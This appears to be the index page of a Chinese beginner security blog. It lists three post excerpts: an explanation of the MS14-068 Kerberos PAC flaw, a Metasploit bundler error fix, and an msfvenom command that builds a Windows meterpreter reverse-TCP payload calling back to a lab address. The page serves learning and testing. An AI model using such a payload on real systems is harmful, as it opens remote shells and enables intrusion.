论安全萌新的自我修养

   :: 首页  :: 新随笔  :: 联系 :: 订阅 订阅  :: 管理

2020年2月23日

摘要: MS14-068是密钥分发中心(KDC)服务中的Windows漏洞。它允许经过身份验证的用户在其Kerberos票证(TGT)中插入任意PAC(表示所有用户权限的结构)。该漏洞位于kdcsvc.dll域控制器的密钥分发中心(KDC)中。用户可以通过呈现具有改变的PAC的Kerberos TGT来获得 阅读全文
posted @ 2020-02-23 14:36 Yangsir34 阅读(467) 评论(0) 推荐(0) 编辑

摘要: 被控端生成:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.5.139 LPORT=2345 -f exe > /root/yangtest.exe msf配置如下当被控端运行后即可上线:msf5 > use exploit/mul 阅读全文
posted @ 2020-02-23 13:05 Yangsir34 阅读(1625) 评论(0) 推荐(0) 编辑

摘要: 报错如下: [*] Bundler failed to load and returned this error: 'cannot load such file -- bundler/setup'[*] You may need to uninstall or upgrade bundler 解决如 阅读全文
posted @ 2020-02-23 12:56 Yangsir34 阅读(562) 评论(0) 推荐(0) 编辑